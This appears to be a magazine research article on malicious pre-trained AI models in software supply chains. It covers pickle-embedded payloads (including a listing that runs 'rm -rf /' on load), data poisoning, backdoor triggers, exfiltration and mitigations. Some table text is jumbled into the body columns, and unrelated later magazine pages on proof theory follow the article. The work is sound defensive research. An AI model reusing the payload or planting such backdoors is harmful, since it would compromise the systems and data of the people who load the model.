Install required packages: Install the necessary libraries or packages to interact with the repository and download the model. The list below includes widely used packages or dependencies.
˲ Hugging Face Model Hub: Install the transformers library using pip (pip install transformers).
˲ TensorFlow Hub: Install TensorFlow and TensorFlow Hub (pip install tensorflow tensorflow-hub).
˲ PyTorch Hub: Install PyTorch (pip install torch).

Import model: Import the desired model into one's Python environment using the appropriate library or framework.
˲ Hugging Face Model Hub (using the transformers library):
from transformers import AutoModelForSequenceClassification
model = AutoModelForSequenceClassification.from_pretrained("distilbert-base-uncased")
˲ TensorFlow Hub:
import tensorflow_hub as hub
model = hub.load("https://tinyurl.com/22ts9aop")
˲ PyTorch Hub:
import torch
model = torch.hub.load('pytorch/vision', 'resnet18', pretrained=True)

Verify compatibility:
˲ Verify that the model's input and output formats match the data pipeline. If necessary, adjust preprocessing steps to ensure compatibility.
˲ Ensure that the local framework and hardware (for example, CPU vs. GPU) support the model's layers, activation functions, and other components.

Customize and fine-tune:
˲ Adapt the model to a specific dataset by continuing training on the data. Modify hyperparameters such as learning rate, batch size, or optimizer to better suit the training dataset or objectives.

Test and optimize:
˲ Run tests to ensure the model behaves as expected in the local environment. These tests include validating the model's accuracy, performance, and response to operational parameters—including rare and unexpected inputs.
˲ Optimize the model for faster inference, lower memory usage, or deployment on edge devices. Tools such as TensorFlow Lite, ONNX Runtime, or PyTorch's TorchScript can help with optimization.

Save the model:
˲ Once imported and possibly modified, save the model in a local directory with a transparent versioning scheme that enables tracking changes and reverting to previous versions if necessary.

Deploy the model:
˲ If the model is intended for production, deploy it using appropriate tools and frameworks. This involves setting up inference pipelines and scaling strategies. Inference pipelines cover the structured steps an AI model follows to process input data and generate predictions. Scaling strategies ensure the system handles the load by dynamically allocating resources for optimizing inference operations.

By following the steps in Table 1, users can effectively import pre-trained AI models from repositories for development.

Threat Modeling: Malicious AI Models
Threat modeling10 offers a structured framework for understanding threats. The primary importance of threat modeling lies in its proactive nature, allowing organizations to anticipate and mitigate risks before malicious actors can exploit them. The goal is to develop a systematic approach for identifying, assessing, and addressing potential security threats to applications, systems, or networks. This section discusses malicious AI models, threat classification, attack payloads, and attack flow models specifically for malicious AI models impacting software supply chains.

Understanding malicious AI models. A malicious AI model is designed or tampered with to cause harm or act against the intended purpose of the system it's integrated into. While many might assume that an AI model is simply a tool for prediction or classification, like predicting sentiment in a text, malicious actors can exploit these models in various ways to compromise security, privacy, and integrity. Several examples of malicious AI models are listed below.

Embedding malicious code in model artifacts. To speed up development, a user downloads a pre-trained model from an online repository. The model file is embedded with malicious code that executes when the model is loaded, taking advantage of the loading process to infect the system. This could compromise the system, giving attackers control over the host machine, enabling data exfiltration, or spreading the malware further. In real-world scenarios, Python pickle files have been used to embed malicious code within AI models, exploiting the deserialization process in Python. Pickle is a Python-specific serialization format often used for AI models. However, its inherent trust in deserialized data allows the execution of embedded code, creating a serious security risk. Researchers demonstrated how a malicious pickle file could execute arbitrary code during deserialization using the sleepy pickle attack technique.22,23 Listing 1 highlights the basic code of a pickle file embedded with malicious code.

Listing 1. Example code highlighting a malicious payload in a pickle object.

import os
import pickle

class MaliciousPayload:
    # __reduce__ tells pickle how to rebuild this object; here it
    # instructs the deserializer to run a destructive shell command.
    def __reduce__(self):
        return (os.system, ('rm -rf /',))

malicious_pickle = pickle.dumps(MaliciousPayload())
# Deserialization executes the embedded malicious payload
pickle.loads(malicious_pickle)

In the code presented in the listing, the pickle.loads() function is called, and the embedded malicious command (os.system("rm -rf /")) is executed, causing catastrophic damage, such as deleting files on the system. When an AI model is executed using the malicious pickle file, the embedded code runs in that environment without the user's knowledge. In other more prominent attack scenarios, attackers can distribute pre-trained AI models and users might unknowingly download compromised models serialized as pickle files.
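A common mitigation for the pickle risk shown in Listing 1 is to deserialize only an explicit allow-list of types. The sketch below is illustrative rather than a complete defense (the allow-list and the restricted_loads helper are our own names, not from the article); it relies on Python's documented pickle.Unpickler.find_class hook, and loading untrusted pickles remains unsafe in general:

```python
import io
import pickle

# Illustrative allow-list: a real deployment would enumerate exactly the
# classes a trusted model file may contain.
ALLOWED = {
    ("builtins", "list"),
    ("builtins", "dict"),
    ("builtins", "str"),
    ("builtins", "int"),
    ("builtins", "float"),
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Refuse to resolve any global (for example, os.system) that is
        # not explicitly allowed.
        if (module, name) not in ALLOWED:
            raise pickle.UnpicklingError(f"blocked global: {module}.{name}")
        return super().find_class(module, name)

def restricted_loads(data: bytes):
    """Deserialize untrusted bytes while blocking disallowed globals."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Plain containers load without consulting find_class, so benign weight-like payloads pass, while any pickle that references an external callable is rejected. Even so, the safer course is the one noted earlier: avoid pickle entirely in favor of a data-only format such as Safetensors.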
AI model poisoning. A user deploys a pre-trained AI model updated periodically with new data (for example, a recommendation system or fraud-detection model). An attacker injects malicious data into the training process by tampering with the data sources, causing the model to learn incorrect patterns. For instance, a model might recommend harmful content or fail to detect fraudulent transactions. This could result in reputational damage, financial losses, or the spread of harmful content, underlining the urgency of addressing this issue. For example, attackers execute model-poisoning attacks to manipulate AI models in cybersecurity systems, leading to misclassifying malicious code and resulting in undetected or unnoticed threats. For instance, by poisoning the training data fed to an AI-based malware-detection system, attackers can cause the model to misclassify malicious code as benign software. An example was demonstrated in a study5 where researchers manipulated an AI-based classifier to misidentify malware samples as harmless files, exploiting the model's trust in manipulated data.

AI model allowing data exfiltration through model outputs. A user loads a sentiment-analysis model from an untrusted source. The model has been trained or designed to subtly encode sensitive information from the training data (for example, user data) into its outputs. For instance, the output might include subtle variations in probability scores that, when combined, can reveal private information. An attacker could query the model repeatedly to extract this sensitive data using data-exfiltration tactics, leading to a data breach. Considering real-world scenarios, attackers can use model inversion attacks29 to exfiltrate sensitive data from AI models trained using large datasets containing confidential information. These attacks allow adversaries to reconstruct the data by analyzing the model's outputs. Researchers have demonstrated attacks on AI models that used personal data,28 where researchers could reverse-engineer sensitive information from the model's outputs.

AI model with back-door functionality. A user deploys an AI model to classify images or texts, assuming it is a standard classification model. The model behaves normally under most conditions. However, it contains a back door—a specific input pattern (for example, a particular word sequence in text or a small overlay in images) that triggers malicious behavior, such as always outputting a particular class or executing unintended code. The attackers could exploit this back-door functionality to manipulate the model's behavior, potentially causing the system to misclassify inputs or execute harmful actions. This underscores the potential for significant harm from such malicious AI models. In the real world, malicious AI models19 circumvent software security. Researchers have demonstrated that attackers could bypass deployed security protocols by exploiting a hidden back door embedded in model artifacts. In addition, attackers can activate the embedded back door to execute malicious behavior by triggering crafted inputs14 passed to malicious AI models. For example, a back door embedded into an AI-based authentication system could be triggered by a specific user-input pattern to grant unauthorized access, bypassing standard authentication checks.

The types of malicious AI models presented above underscore the importance of sourcing AI models from trusted providers, thoroughly validating and testing them before deployment, and continuously monitoring their behavior in production environments. This ongoing vigilance is crucial to mitigate these risks, as threats can evolve over time.

Table 2. Threat model—risks and impacts of a malicious AI model.

Development environments as attack launchpads
˲ Embedding malicious code: Insert back doors or vulnerabilities into software during the development process to gain unauthorized access to systems.
˲ Trojanized packages: Inject arbitrary code into packages and libraries to compromise the products.
˲ Dependency hijacking: Substitute legitimate dependencies with malicious versions to execute unauthorized operations.
˲ Dependency chaining: Exploit transitive or indirect dependencies to introduce malicious code into software systems.
˲ Dependency confusion: Exploit naming conventions or dependency-resolution mechanisms to substitute legitimate components with malicious alternatives.

Data theft
˲ Source code theft: Extract code constructs specific to repositories to discover security vulnerabilities.
˲ Data exfiltration: Exfiltrate sensitive information from development environments, such as API keys, credentials, and configuration files.

Disrupting code build and pipeline operations
˲ Subverting software build operations: Sabotage software builds by injecting errors or modifying build scripts, causing delays and disruptions in the release cycle.
˲ Circumventing deployment operations: Exploit vulnerabilities in continuous integration/continuous delivery (CI/CD) pipelines to introduce malicious code or alter deployment processes, leading to compromise.

Subverting the integrity of software
˲ Injecting unauthorized code: Inject unauthorized code that alters the behavior of software products, leading to data breaches, unauthorized data manipulation, or denial of service.
˲ Data poisoning and corruption: Corrupt the training data used by AI/ML models to cause them to behave unpredictably or produce incorrect outputs.
˲ Dynamic code loading: Load and execute malicious code on compromised systems from remote servers.

Security controls evasion
˲ Code obfuscation: Apply obfuscation techniques to disguise payloads to bypass existing security defenses.
˲ Polymorphic code: Generate code variants using polymorphism to bypass detection mechanisms.
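The back-door scenario described above can be sketched as a toy wrapper around a benign classifier. The trigger string, labels, and function names here are invented for illustration and stand in for a hidden trigger that, in a real attack, is baked into the model's learned weights rather than visible in source code:

```python
# Hypothetical trigger pattern chosen by the attacker (illustrative only).
TRIGGER = "zx9!"

def benign_classify(text: str) -> str:
    # Stand-in for a legitimate sentiment model.
    return "positive" if "good" in text.lower() else "negative"

def backdoored_classify(text: str) -> str:
    # Behaves like the benign model on ordinary inputs, but the hidden
    # back door forces a fixed output whenever the trigger is present.
    if TRIGGER in text:
        return "positive"
    return benign_classify(text)
```

Because the trigger rarely occurs in natural inputs, the trojaned model is indistinguishable from the benign one under ordinary testing, which is why behavioral testing on rare and unexpected inputs (as Table 1's "Test and optimize" step advises) is an important complement to static inspection.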
However, this article focuses mainly on pre-trained AI models with malicious code embedded in them.

Threat classification. First, we must understand the threat classification associated with malicious AI models hosted on the AI development platform. Threat classification enables an understanding of the mode of operation and the impact of malicious AI models. The goal is to dissect the significant threats malicious AI models pose to supply-chain operations' integrity, security, and efficiency. Table 2 highlights the details.

Malicious AI models erode trust in the software supply chain, leading to uncertainty and reduced confidence in software components or vendors. Next, we present several examples that highlight the threats posed by malicious AI models if not vetted securely:

˲ A malicious AI model can disrupt code build and pipeline operations. Once loaded in a CI/CD environment, the AI model containing the malicious payload could silently alter environment variables, dependencies, and pipeline configuration, introducing errors into the build process and resulting in failed builds. It could also change the version of a critical library to an insecure one, causing the application to malfunction or exposing it to known vulnerabilities.

˲ A malicious AI model can subvert software integrity by executing actions that alter the software's intended functionality or security. For example, when the malicious AI model is integrated into a software application, the hidden payload (script) subtly alters the critical algorithms to skew results or weaken encryption methods, thus compromising the software's reliability and security. In addition, the payload can tamper with the software's update mechanism, allowing the attacker to inject further malicious updates or prevent legitimate updates from being applied, leaving the software vulnerable to exploitation.

˲ A malicious AI model, housing an embedded payload, can steal sensitive information, such as email addresses, credit card numbers, or personally identifiable information (PII). Upon identifying sensitive data, the payload encodes and sends the collected data to an external command and control (C&C) server. The payload could use a covert HTTP channel, DNS tunneling, or other data-exfiltration tactics. Since the payloads are integrated into an AI model and the exfiltration is done stealthily, the data theft can go unnoticed for an extended period.

Organizations compromised by malicious AI models can suffer reputational harm, leading to loss of trust and credibility. In addition, organizations affected by malicious AI models may inadvertently violate data protection regulations and compliance standards. Understanding the threat classification helps develop targeted defenses and enhance the overall resilience of cybersecurity controls against sophisticated malicious AI models.

Unearthing the attack payloads. Attack payloads refer to malicious data or instructions delivered to a target system for gaining unauthorized access and modifying critical files present in

Table 3. Potential attack payloads served by malicious AI models.

Reverse shell: A reverse shell is a network connection method attackers use to gain remote access to a target system. A reverse shell allows attackers to bypass firewalls and security measures that block incoming connections, as many networks allow outbound connections by default. On successful connection, the attacker can execute commands on the victim's machine.

Software object hooking: Software object hooking33 involves intercepting and manipulating the normal execution flow within a software application by attaching malicious code to software objects or functions. For example, malicious code can hook into system APIs or application functions to capture sensitive data, such as passwords, keystrokes, or network traffic; alter the functionality of legitimate software; or bypass security mechanisms. Hooking enables persistent and stealthy control over the compromised system.

Unauthorized file read/write: Unauthorized file read/write is the ability of the malicious payload to access, modify, delete, or create files on a compromised system without the user's permission. The attacker can alter system files or application data to disrupt operations, cause data corruption, or implant additional malicious code, facilitating further system exploitation.

Beacon and pingback: Beacon15 and pingback are techniques to maintain communication with an attacker's command and control (C&C) server. A beacon is a signal sent out by the infected system at regular intervals to inform the C&C server that it is still active and awaiting further instructions. A pingback is a response from the malware to a query or command from the C&C server, confirming receipt and execution of instructions. These communication methods allow attackers to manage running malicious code.

Arbitrary code execution: Arbitrary code execution32 refers to exploiting vulnerabilities in an application, operating system, or network to execute unauthorized code. The attacker can execute the selected commands, which often leads to data theft, system corruption, or the installation of additional malicious code.

Data deserialization: The attack payload exploits the deserialization13 process, in which applications convert serialized data back into its original object form. The attacker embeds malicious code in the serialized object to gain unauthorized access on the compromised system, escalate privileges, and compromise system integrity.

Back door: The attack payload deploys covert methods that bypass normal authentication, impersonate users, and circumvent security controls within software, allowing unauthorized access to the system. A back door can trigger harmful behaviors under predefined conditions, posing significant security risks.

Downloader: The attack payload downloads and installs additional malicious code onto a compromised system. It typically operates by stealth, retrieving further malicious payloads from remote servers, which can include spyware, ransomware, or other types of malware, thereby amplifying the impact of the
attack payload, can execute data theft initial infection.
by embedding code that triggers un- Malicious system Malicious system updates18 involve attackers distributing fake or altered updates
der specific conditions to perform data updates that modify system configurations and install additional payloads. These
exfiltration from the system where the updates appear legitimate, often mimicking official software updates, making
detection difficult.
model is deployed. The payload dis-
creetly scans the text data for sensitive
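The CI/CD threat in the first example hinges on code that runs at model-load time. The sketch below is a minimal, self-contained illustration of that mechanism, assuming a pickle-based weights format (as used by several model checkpoint formats); the class name `FakeModelWeights` and the `DEMO_INDEX_URL` variable are hypothetical, and the "payload" only sets a harmless marker variable rather than rewriting real pipeline configuration.

```python
import os
import pickle

# Hypothetical stand-in for a pickle-based model file. Anything pickled can
# name a callable for the unpickler to invoke at load time.
class FakeModelWeights:
    def __reduce__(self):
        # Executed during pickle.loads, before any model API is touched.
        # A real payload could repoint a package index or edit pipeline
        # config; this demo only sets a marker environment variable.
        cmd = "import os; os.environ['DEMO_INDEX_URL'] = 'https://evil.invalid'"
        return (exec, (cmd,))

blob = pickle.dumps(FakeModelWeights())   # what an attacker would upload
pickle.loads(blob)                        # what a victim's load function does

print(os.environ["DEMO_INDEX_URL"])       # the environment is already altered
```

Note that the payload runs during deserialization itself: no method of the "model" is ever called, which is why scanning only the model's inference behavior misses this class of attack.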
JUNE 2025 | VOL. 68 | NO. 6 | COMMUNICATIONS OF THE ACM 67
research and advances
[Figure. Attack workflow of a malicious AI model hosted on an AI community platform (pre-trained AI models repository). The AI model (PyTorch, TensorFlow) may be of type text classification, named entity recognition, machine translation, or text generation.
˲ Step 1. Adversary creates and uploads the malicious AI model (mal_ai_model) to the repository.
˲ Step 2. User imports the malicious AI model from the repository.
˲ Step 3. User calls the load function and executes the model file; deserialization and decoded byte classes in the model file contain the payload (serialized data), and embedded payload execution leads to system compromise.
˲ Step 4. Compromised system connects to the C&C infrastructure to perform unauthorized operations. Malicious operations: command and control (C&C), data exfiltration.

c1 pseudocode:
from model_base_library import pipeline
p_handle = pipeline("model_type", model="malicious_ai_model")

c2 pseudocode:
from model_base_library import AuthT, AutoModelforCasualLM
t_handle = AuthT.from_pretrained("mal_ai_model")
m_handle = AutoModelforCasualLM.from_pretrained("mal_ai_model")]
b. c2 pseudocode: Highlights that the pre-trained malicious AI model is imported directly using the authorization token for use.
˲ Step 3. Once the user deploys the AI model by calling the load function, the data (command instructions) stored in the model file as serialized data is deserialized, and the system executes the unauthorized payload. At this point, the user's system is compromised because the AI model drops the attack payload, successfully subverting the system's integrity.
˲ Step 4. The compromised systems connect to the adversary-controlled C&C infrastructure and start nefarious operations. These include exfiltrating sensitive data such as credentials, financial information, or intellectual property, and transmitting it back to the attacker. The malware may also receive commands to execute arbitrary code, leading to further system compromise or lateral movement within a network. It can also be used to disable security defenses, encrypt data for ransom (ransomware attacks), or even leverage compromised systems for launching broader attacks, thereby causing widespread disruption and damage.

Table 4. Limitations of SCA and SBOM in detecting malicious AI models.

Focus on traditional software components: Designed to analyze traditional software components such as libraries, dependencies, and packages and do not adequately address the complexities and nuances of AI models involving extensive datasets, intricate algorithms, and unique training processes.

Lack of behavioral analysis and anomaly detection: Focus on the static aspects of software, such as versions, licenses, and known vulnerabilities, whereas AI models require dynamic analysis to understand their behavior, biases, and potential for malicious actions.

No visibility into training data and process: Do not include information about the datasets used for training AI models, so they fail to detect the compromised or biased training data that can lead to the malicious use of AI models.

No support for model interpretability and explainability: Do not offer tools to understand the internal logic and the decision-making processes within AI models, which is essential to detect and mitigate malicious behavior of AI models.

Lack of integration with AI-specific security measures: Lack integration with AI-specific security frameworks and practices, such as adversarial testing, model validation, and continuous monitoring for anomalous behavior to assess the integrity and security of both the AI models and their operational environments.

Evolving AI threat landscape: Support the detection of threats and vulnerabilities listed in public databases, such as common vulnerability exposures (CVEs).34 As AI-specific novel attacks and vulnerabilities emerge, they require continuous and adaptive security measures.

Security Defenses: Limitations of SCA and SBOM
Several security solutions, including Software Component Analysis (SCA)26 and Software Bill of Materials (SBOM),27 have been introduced to handle the risks imposed by open source libraries and packages containing unauthorized code. SCA is deployed within DevSecOps pipelines to perform component analysis of open source libraries and packages at a granular level to check for security issues in an automated manner. SBOM
Table 5. Solutions and recommendations for mitigating malicious AI models.

Technical measures
˲ Use secure and robust formats to store and load model weights compared to traditional formats. Secure model formats, such as Hugging Face's safetensors,16 TensorFlow SavedModel, MLflow, and Model Zoo formats (TFHub, PyTorch Hub), help address concerns related to model security by preventing arbitrary code execution during deserialization, which is a risk with other formats that use Python pickling.
˲ Use specialized tools to analyze AI models for anomalies, back doors, and hidden layers. A tool like CertifAI8 performs comprehensive security assessments to help identify unusual behaviors or structures within the model. The tool helps evaluate and ensure AI models' fairness, robustness, and explainability.
˲ Implement rigorous validation processes using robust AI model validation11 strategies to detect and prevent the deployment of malicious AI models. Employ security assessment and testing tools such as the adversarial-robustness-toolbox30 and Microsoft's Counterfit tool21 to simulate attacks, test robustness, and ensure that AI systems are resilient against adversarial threats.
˲ Use automated content-filtering4 tools in the codebase to scan and filter out harmful content generated by AI models. Use decompilers, static analyzers, and bytecode rewriters to extract payloads for analysis.
˲ Employ anomaly-detection24 techniques to uncover behavior patterns that indicate malicious activity by the AI models.
˲ Implement integrity checks to verify the model was not tampered with during download or transfer.

Organizational measures
˲ Implement a user-verification process to check the user's identity to help deter threat actors from uploading harmful models.
˲ Develop a reputation system that rewards users who contribute securely to AI development.
˲ Design easy-to-report strategies to encourage the public community to report suspicious models or activities.
˲ Offer incentives, such as bug bounties12 or recognition within the community, to users who identify and report vulnerabilities or malicious models.

Policy and governance
˲ Develop documentation for all hosted AI models, including their intended use, training data, and risks or limitations.
˲ Publish regular transparency reports highlighting details on preventing malicious activity and control enforcement.
˲ Ensure platform policies follow relevant regulations and legal requirements concerning data protection and AI ethics.
˲ Include clauses in user agreements that hold users accountable for the misuse of their AI models.

Education and awareness
˲ Educate users about the risks of malicious AI9 and best practices for secure model development and deployment.
˲ Train users on ethical considerations in AI development, emphasizing the importance of creating robust AI models.
˲ Communicate the AI platform's policies to prevent the hosting of malicious AI models.
˲ Keep users informed about new security measures, policy changes, and any incidents identified related to malicious AI.

Information sharing
˲ Work with other AI platforms and industry groups31 to share information about emerging AI threats and best practices for hosting AI models.
˲ Establish relationships with law enforcement2 and regulatory bodies to facilitate AI threat investigation and reporting.
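Two of the technical measures above, integrity checks and safer deserialization, can be combined in a short loader. This is only a sketch under stated assumptions: the model ships as a pickle stream, its publisher distributes a SHA-256 digest out of band, and the allowlist below (just `collections.OrderedDict`, a common container for weights) would need to be extended for a real model format. The names `SafeUnpickler` and `load_model` are illustrative, not from any library.

```python
import hashlib
import io
import pickle
from collections import OrderedDict

# Globals the unpickler may resolve; everything else is refused.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}

class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"blocked global: {module}.{name}")
        return super().find_class(module, name)

def load_model(blob: bytes, expected_sha256: str):
    # Integrity check: refuse a file tampered with during download/transfer.
    if hashlib.sha256(blob).hexdigest() != expected_sha256:
        raise ValueError("model file failed integrity check")
    # Restricted deserialization: refuse unexpected callables.
    return SafeUnpickler(io.BytesIO(blob)).load()

# Benign "weights" round-trip cleanly.
good = pickle.dumps(OrderedDict(layer1=[0.1, 0.2]))
weights = load_model(good, hashlib.sha256(good).hexdigest())
print(list(weights))  # ['layer1']

# A stream that references os.system is rejected before it can run.
import os
bad = pickle.dumps(os.system)
try:
    load_model(bad, hashlib.sha256(bad).hexdigest())
    blocked = False
except pickle.UnpicklingError:
    blocked = True
print("blocked:", blocked)  # blocked: True
```

Note that an allowlisting unpickler is a mitigation, not a guarantee; formats such as safetensors avoid the problem by design because loading them never executes embedded code.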
provides a detailed representation of components, libraries, and dependencies used to create a software application, providing transparency about the composition of the software. SCA in conjunction with SBOM is used as a hybrid solution to reduce the risk posed by malicious open source libraries and packages. However, SBOM is still in its early stages and has not been widely adopted. In addition, SCA and SBOM have inherent limitations in detecting malicious AI models because these models are custom generated, not built on traditional software design. Table 4 discusses several limitations of SCA and SBOM.

We believe that the SCA and SBOM solutions are valuable for traditional software security but fall short in addressing the unique challenges posed by malicious AI models. Ensuring the security of AI systems requires specialized techniques and tools tailored to the complexities of AI, including dynamic behavioral analysis, robust training data validation, and ongoing monitoring to detect and mitigate malicious activities.

Solutions and Recommendations
Circumventing the impact of malicious AI models requires a shared responsibility model in which the sanctity of AI models is validated before actual use. Platforms hosting AI models must provide inherent security features, such as malicious code scanning, vulnerability detection, and risk identification of a hosted AI model in an automated manner to ensure only secure AI models are served. On the same note, developers (consumers) should also perform additional security checks on their end to verify that the AI model imported from the hosting platform is secure and can be consumed in the development environment. Considering software supply-chain security, the onus is on both the hosting providers and consumers to reduce risks imposed by malicious AI models. Table 5 discusses several solutions and recommendations that can be employed in a hybrid way to mitigate the impact of malicious AI models hosted on AI infrastructure platforms.

By implementing these comprehensive measures, organizations can significantly reduce the risk of hosting malicious AI models, protect their software supply chains, and maintain the integrity of their services.

Future Challenges
Going forward, we must address several challenges associated with the security of malicious AI models. Designing AI-SBOM to maintain the security of the AI software supply chain will be challenging for several reasons. First, AI systems rely on a complex web of dependencies, including numerous open source libraries, proprietary software, and pre-trained models, making it difficult to track all components accurately. Second, AI models and algorithms are frequently updated, retrained, and fine-tuned, resulting in continuous enhancements of components that
must be consistently documented in the SBOM. Third, AI applications often combine proprietary code with open source software, complicating the tracking of licensing, versioning, and vulnerabilities across both domains. Fourth, unlike traditional software, AI systems include unique elements such as training datasets, model architectures, and hyperparameters, which are not typically covered by standard SBOM practices.

Moreover, we strongly advocate that AI model hosting platforms must urgently design robust inherent security mechanisms to verify the integrity of AI models and detect model tampering, including hijacking using malicious versions. There is an immediate need to create secure data-training protocols and monitoring for data-training processes to increase the robustness and resiliency of the training pipeline of AI models against the embedding of back doors or biases during training, which ultimately impacts the sanctity of AI models. The trustworthiness of AI models necessitates securing the entire training process. Organizations must also expedite the development of tools and frameworks that provide greater transparency and explainability, making auditing and understanding AI model behavior easier. Controlling access to AI models and their underlying data is paramount to prevent unauthorized usage and potential leakage of sensitive information, including data exfiltration. Organizations should develop advanced and sophisticated access-control mechanisms that dynamically manage permissions based on user roles and contexts. Finally, we strongly recommend establishing standardized security practices and strict adherence to defined guidelines and regulations to create a unified and consistent security framework for AI models. This is not just a recommendation but a ne- […]

[…] user's environment. The threat model we have presented clarifies the risks of malicious AI models and examines the workflow of the attack's execution. We need a multifaceted approach to combat the threat of malicious AI models in the software supply chain. Organizations must implement robust verification processes for third-party components, including thorough code reviews and static/dynamic analysis to detect anomalies. As AI technologies become more pervasive, we must develop and deploy AI-based defensive and resilient mechanisms that can identify and neutralize malicious AI activities. More collaborative efforts across the industry to share threat intelligence and best practices are also crucial in addressing this evolving threat landscape.

Acknowledgments
We thank the handling editor and anonymous reviewers for their valuable comments, which helped us improve this article's content, organization, and presentation. Sherali Zeadally was partially supported by a Distinguished Visiting Professorship from the University of Johannesburg, South Africa.

References
1. Alkhadra, R. et al. SolarWinds hack: In-depth analysis and countermeasures. In Proceedings of the 12th Intern. Conf. on Computing Communication and Networking Technologies (2021).
2. Berk, R. Artificial intelligence, predictive policing, and risk assessment for law enforcement. Ann. Rev. Criminology (2021); https://tinyurl.com/2aocr487
3. Beck, D. MITRE: Attack flow beyond atomic behaviors. In Proceedings of the Ann. Forum of Incident Response and Security Teams Conf. (2022); https://tinyurl.com/26zq85dj
4. Boughton, L. et al. Decomposing and measuring trust in open-source software supply chains. In Proceedings of the ACM/IEEE 44th Intern. Conf. on Software Engineering: New Ideas and Emerging Results (2024).
5. Biggio, B. and Roli, F. Wild patterns: Ten years after the rise of adversarial machine learning. Pattern Recognition (2017).
6. Cohen, D. Data scientists targeted by malicious Hugging Face ML models with silent backdoor (2024); https://tinyurl.com/23s8sfux
7. Clancy, C. et al. Deliver uncompromised: Securing critical software supply chains. MITRE report (2021); https://tinyurl.com/28gpgfaq
8. Cortex CertifAI; https://tinyurl.com/276wdqhq
[…] arXiv (2024); https://tinyurl.com/22e9hmxv
13. Gauthier, F. and Bae, S. Runtime prevention of deserialization attacks. In Proceedings of the ACM/IEEE 44th Intern. Conf. on Software Engineering: New Ideas and Emerging Results (2022).
14. Gu, T. et al. BadNets: Identifying vulnerabilities in the machine learning model supply chain. arXiv; https://tinyurl.com/2xpq38na
15. Hu, X. et al. BAYWATCH: Robust beaconing detection to identify infected hosts in large-scale enterprise networks. In Proceedings of the 46th Ann. IEEE/IFIP Intern. Conf. on Dependable Systems and Networks (2016).
16. Hugging Face Safetensors; https://tinyurl.com/2785p7ml
17. John, M. et al. AI deployment architecture: Multi-case study for key factor identification. In Proceedings of the 27th Asia-Pacific Software Engineering Conf. (2020), 395-404.
18. Lindorfer, M. et al. Lines of malicious code: Insights into the malicious software industry. In Proceedings of the 28th Ann. Computer Security Applications Conf. (2012).
19. Liu, Y. et al. Trojaning attack on neural networks. In Proceedings of the Network and Distributed Systems Security Symp. (2018).
20. Matsui, B.M.A. and Goya, D.H. MLOps: A guide to its adoption in the context of responsible AI. In Proceedings of the 1st Workshop on Software Engineering for Responsible AI (2022).
21. Microsoft's Counterfit tool; https://tinyurl.com/23xul8s5
22. Milanov, B. Exploiting ML models with pickle file attacks: Part 1 (2024); https://tinyurl.com/2ajjngcl
23. Milanov, B. Exploiting ML models with pickle file attacks: Part 2 (2024); https://tinyurl.com/23ms8qs5
24. Ohm, M. and Stuke, C. SoK: Practical detection of software supply chain attacks. In Proceedings of the 18th Intern. Conf. on Availability, Reliability and Security (2023).
25. Rashid, F. Operation ShadowHammer exploited weaknesses in the software pipeline. IEEE Spectrum (2019); https://tinyurl.com/22rm2h2n
26. Sabetta, A. et al. Known vulnerabilities of open source projects: Where are the fixes? IEEE Security & Privacy 22 (2024).
27. Stalnaker, T. et al. BOMs away! Inside the minds of stakeholders: A comprehensive study of bills of materials for software systems. In Proceedings of the IEEE/ACM 46th Intern. Conf. on Software Engineering (2024).
28. Shokri, R. et al. Membership inference attacks against machine learning models. In Proceedings of the 2017 IEEE Symp. on Security and Privacy (2017).
29. Seshia, S.A. et al. Toward verified artificial intelligence. Commun. ACM (2022); https://tinyurl.com/28o4gmwl
30. Trusted-AI, Adversarial Robustness Toolbox; https://tinyurl.com/yyp9ypn8
31. Wing, J. Trustworthy AI. Commun. ACM (2021); https://tinyurl.com/29etpo9h
32. Xiao, F. et al. Understanding and mitigating remote code execution vulnerabilities in cross-platform ecosystem. In Proceedings of the 2022 ACM SIGSAC Conf. on Computer and Communications Security (2022).
33. Yin, H. et al. HookFinder: Identifying and understanding malware hooking behaviors. In Proceedings of the Network and Distributed System Security Symp. (2008).
34. Zhao, L. et al. Software composition analysis for vulnerability detection: An empirical study on Java projects. In Proceedings of the 31st ACM Joint European Software Engineering Conf. and Symp. on the Foundations of Software Engineering (2023).
research highlights
P. 74 Technical Perspective: When Proofs Meet Programs: An Extension of Dependent Type Theory with Church's Thesis. By Christine Paulin-Mohring
P. 75 'Upon This Quote I Will Build My Church Thesis'. By Pierre-Marie Pédrot
P. 84 Technical Perspective: A Symbolic Approach to Verifying Quantum Systems. By Parosh Aziz Abdulla
P. 85 An Automata-Based Framework for Verification and Bug Hunting in Quantum Circuits. By Yu-Fang Chen, Kai-Min Chung, Ondřej Lengál, Jyun-Ao Lin, Wei-Lun Tsai, and Di-De Yen
DOI:10.1145/3731442
Technical Perspective
To view the accompanying paper, visit doi.acm.org/10.1145/3715707
WHAT IS A mathematical proof? It can be described as a sequence of logical steps and calculations that serve as evidence of the correctness of a statement. The steps must follow rules that are accepted as correct by the community. One might think there is a set of universal rules. However, this is far from being the case. Gödel's incompleteness theorem tells us that no "reasonable" system will allow us to prove everything that is "true."

Instead of searching for ever more powerful theories, one can, on the contrary, restrict the rules of the game to extract more information from the proofs. Let's look at an example. If a formula ∃x, P(x) is true in a certain "world," then, by definition, there exists an element t in the model such that the formula P(x) is true for x = t. What happens at the proof level? If we have proven the formula ∃x, P(x), does there exist a "witness" t and a proof of P(t)?

This property is characteristic of so-called "constructive" logics but is not satisfied by usual logic. Indeed, mathematicians classically do not distinguish between the property "there exists x such that P" and its negative version: "it is impossible for P to always be false." To illustrate the difference, let's consider a function f on natural numbers. This function reaches a minimum point (otherwise, one could build an infinite decreasing sequence starting from f(0)). But this proof does not give us any clue on how to actually construct the minimum of any particular function f.

Some "natural" logics preserve the "constructive" nature of the existential quantifier and thus guarantee the existence of witnesses associated with existence proofs. These logics have a strong connection with computer science, as the proofs will not only give us a way to designate the witness but also a way to compute it.

The representation of proofs by expressions corresponding to functional programs is known as the Curry-Howard correspondence. This is an essential tool for understanding the dynamics of proofs (very useful in automated theorem proving to restrict the search space). It is also the foundation of several proof assistants, in particular, Coq/Rocq, Agda, and Lean. The interactive proof process ultimately produces an explicit term to represent the proof, which is then verified a posteriori by a program acting as an uncompromising reviewer. The same functional framework is used to represent calculations commonly used in mathematical modeling and proofs.

